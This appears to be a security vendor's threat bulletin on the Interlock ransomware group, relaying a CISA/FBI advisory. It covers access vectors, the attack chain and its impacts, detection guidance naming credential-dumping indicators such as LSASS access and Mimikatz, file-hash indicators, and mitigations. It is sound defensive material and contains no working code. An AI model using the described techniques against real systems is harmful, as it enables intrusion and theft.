CISA and FBI Issue Joint Warning on Interlock Ransomware Targeting Critical Infrastructure
July 23rd, 2025
High
Our Cyber Threat Intelligence Unit is closely monitoring activity linked to the Interlock ransomware group, as outlined in a joint advisory issued by CISA, FBI, HHS, and MS-ISAC. Active since September 2024, Interlock is a financially motivated threat actor targeting organizations across North America and Europe. The group uses a double extortion model, encrypting systems and exfiltrating sensitive data to coerce victims into paying ransoms. Interlock actors leverage uncommon initial access vectors, including drive-by downloads from compromised legitimate websites, and a social engineering technique known as “ClickFix,” which deceives users into executing malicious payloads disguised as important system fixes or browser updates.
Technical Details
Threat Actor: Interlock Ransomware Group
Severity: High
Targeted Sectors: Critical Infrastructure, Healthcare, Education, Government, Manufacturing
Attack Type: Double Extortion Ransomware
Initial Access Vectors:
Drive-by downloads from compromised legitimate websites
“ClickFix” technique, which lures users into executing fake browser updates or system fixes.
Attack Chain Characteristics:
Execution: Base64-encoded PowerShell scripts launched through user interaction
Persistence: Deployment of custom Remote Access Trojans (RATs) for long-term access
Credential Access: Credential dumping and privilege escalation via known tools and techniques
Lateral Movement: Remote Desktop Protocol (RDP) exploitation and internal network discovery
Impact: File encryption on Windows and Linux systems, including virtualized environments
Exfiltration: Data theft conducted prior to encryption to maximize extortion leverage
Impact
The Interlock ransomware campaign poses a significant threat to business operations, data security, and public trust. Affected organizations face both technical and reputational consequences. Key impacts include:
Operational Disruption: Encrypting critical systems leads to downtime, service outages, and reduced functionality.
Data Breaches: Exfiltrated information often contains sensitive personally identifiable information (PII), protected health information (PHI), and proprietary corporate data.
Financial Loss: Victims might face significant expenses from ransom payments, forensic investigations, and recovery efforts.
Reputational Damage: Publicly disclosing a breach can erode stakeholder confidence and customer trust.
Regulatory Consequences: Compromised data could cause violations of HIPAA, GDPR, or other relevant data protection laws.
A notable example happened in May 2025, when Interlock targeted Kettering Health, disrupting operations in 14 hospitals and over 120 clinics.
Detection Method
Detecting Interlock ransomware activity requires a layered monitoring approach that encompasses endpoints, network traffic, user behavior, and system integrity. Organizations should implement the following strategies:
PowerShell Monitoring:
Detect use of Base64-encoded PowerShell commands.
Alert on script execution from unusual or temporary directories.
Web Traffic Analysis:
Monitor access to known malicious domains impersonating browser or system updates.
Use DNS filtering and proxy logs to detect suspicious traffic.
Endpoint Detection:
Detect creation of new or unauthorized scheduled tasks or services.
Monitor for file encryption patterns and abnormal file renaming patterns.
Network Behavior Monitoring:
Identify outbound connections to known or suspicious command-and-control (C2) infrastructure.
Flag signs of DNS tunneling or data exfiltration attempts.
RAT Activity Detection:
Monitor for persistence mechanisms such as registry modifications and auto-start entries.
Use EDR solutions to detect behaviors consistent with known Remote Access Trojans
Credential Dumping Indicators:
Alert on LSASS access or execution of tools like Mimikatz.
Monitor for abnormal authentication patterns.
Lateral Movement Detection:
Watch for RDP or WMI connections from non-standard hosts.
Detect PsExec usage across the network.
File Integrity Monitoring (FIM): Track unauthorized changes to system files or backups.
SIEM Correlation Rules: Correlate login anomalies, encryption events, and outbound traffic.
User Behavior Analytics (UBA): Detect deviations in user behavior, such as unusual access or script execution.
Indicators of Compromise
File Name | Hash |
1.ps1 | fba4883bf4f73aa48a957d894051d78e0085ecc3170b1ff50e61ccec6aeee2cd |
advanced_port_scanner.exe | 4b036cc9930bb42454172f888b8fde1087797fc0c9d31ab546748bd2496bd3e5 |
Aisa.exe | 18a507bf1c533aad8e6f2a2b023fbbcac02a477e8f05b095ee29b52b90d47421 |
AnyDesk.exe | 1a70f4eef11fbecb721b9bab1c9ff43a8c4cd7b2cafef08c033c77070c6fe069 |
autoservice.dll | a4069aa29628e64ea63b4fb3e29d16dcc368c5add304358a47097eedafbbb565 |
Autostart.exe | d535bdc9970a3c6f7ebf0b229c695082a73eaeaf35a63cd8a0e7e6e3ceb22795 |
cht | FAFCD5404A992850FFCFFEE46221F9B2FF716006AECB637B80E5CD5AA112D79C |
cht.exe | C20BABA26EBB596DE14B403B9F78DDC3C13CE9870EEA332476AC2C1DD582AA07 |
cleanup.dll (SystemBC) | 1845a910dcde8c6e45ad2e0c48439e5ab8bbbeb731f2af11a1b7bbab3bfe0127 |
conhost | 44887125aa2df864226421ee694d51e5535d8c6f70e327e9bcb366e43fd892c1 |
conhost.dll | a70af759e38219ca3a7f7645f3e103b13c9fb1db6d13b68f3d468b7987540ddf |
conhost.dll | 96babe53d6569ee3b4d8fc09c2a6557e49ebc2ed1b965abda0f7f51378557eb1 |
difxepi.dll (SystemBC) | 1845a910dcde8c6e45ad2e0c48439e5ab8bbbeb731f2af11a1b7bbab3bfe0127 |
iexplore.exe | d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb |
klg.dll | A4F0B68052E8DA9A80B70407A92400C6A5DEF19717E0240AC608612476E1137E |
!!!OPEN_ME!!!.txt | 68A49D5A097E3850F3BB572BAF2B75A8E158DADB70BADDC205C2628A9B660E7A |
processhacker-2.39-bin.zip | 88f26f3721076f74996f8518469d98bf9be0eaee5b9eccc72867ebfc25ea4e83 |
PsExec.exe | 078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b |
putty.exe | 7a43789216ce242524e321d2222fa50820a532e29175e0a2e685459a19e09069 |
puttyportable.exe | 97931d2e2e449ac3691eb526f6f60e2f828de89074bdac07bd7dbdfd51af9fa0 |
PuTTYPortable.zip | ff7ad2376ae01e4b3f1e1d7ae630f87b8262b5c11bc5d953e1ac34ffe81401b5 |
qrpce91.exe.asd | 64a0ab00d90682b1807c5d7da1a4ae67cde4c5757fc7d995d8f126f0ec8ae983 |
ScreenConnect.ClientService.exe | 2814b33ce81d2d2e528bb1ed4290d665569f112c9be54e65abca50c41314d462 |
SophosendpointAgent.exe | f51b3d054995803d04a754ea3ff7d31823fab654393e8054b227092580be43db |
SophosScaner.exe | dfb5ba578b81f05593c047f2c822eeb03785aecffb1504dcb7f8357e898b5024 |
Starship.exe | 94bf0aba5f9f32b9c35e8dfc70afd8a35621ed6ef084453dc1b10719ae72f8e2 |
start | 28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f |
start.exe | 70bb799557da5ac4f18093decc60c96c13359e30f246683815a512d7f9824c8f |
StorageExplorer.exe | 73a9a1e38ff40908bcc15df2954246883dadfb991f3c74f6c514b4cffdabde66 |
Sysmon.sys | 1d04e33009bcd017898b9e1387e40b5c04279c02ebc110f12e4a724ccdb9e4fb |
upd_2327991.exe | 7b9e12e3561285181634ab32015eb653ab5e5cfa157dd16cdd327104b258c332 |
webujgd.lnk | 70EE22D394E107FBB807D86D187C216AD66B8537EDC67931559A8AEF18F6B5B3 |
WinSCP-6.3.5-Setup.exe | 8eb7e3e8f3ee31d382359a8a232c984bdaa130584cad11683749026e5df1fdc3 |
Proxy Tool | e4d6fe517cdf3790dfa51c62457f5acd8cb961ab1f083de37b15fd2fddeb9b8f |
Encryptor | e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1 |
Encryptor | c733d85f445004c9d6918f7c09a1e0d38a8f3b37ad825cd544b865dba36a1ba6 |
Encryptor | 28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f |
pack.jar | 3703374c9622f74edc9c8e3a47a5d53007f7721e |
autorun.log | 514946a8fc248de1ccf0dbeee2108a3b4d75b5f6 |
jar.jar | b625cc9e4024d09084e80a4a42ab7ccaa6afb61d |
Recommendations
Patch Management: Keep OS, software, and firmware up to date.
User Awareness: Train users to recognize fake browser updates and phishing attempts.
Network Segmentation: Isolate critical systems to limit lateral movement.
Multi-Factor Authentication (MFA): Enforce MFA across all services.
Backup Strategy: Maintain offline, encrypted backups and test recovery procedures.
ICAM Policies: Implement strong identity, credential, and access management.
Threat Intelligence Integration: Use CISA-provided IOCs to enhance detection.
Conclusion
The Interlock ransomware campaign highlights the increasing sophistication of financially motivated threat actors. By combining deceptive social engineering techniques with advanced persistence mechanisms, Interlock actors pose a sustained threat to organizations across multiple sectors. Defending against this threat requires a layered security approach that integrates technical safeguards, user awareness, and continuous monitoring to mitigate the risk of ransomware attacks. Leveraging threat intelligence and collaborating with agencies like CISA is essential to staying ahead of ransomware operations.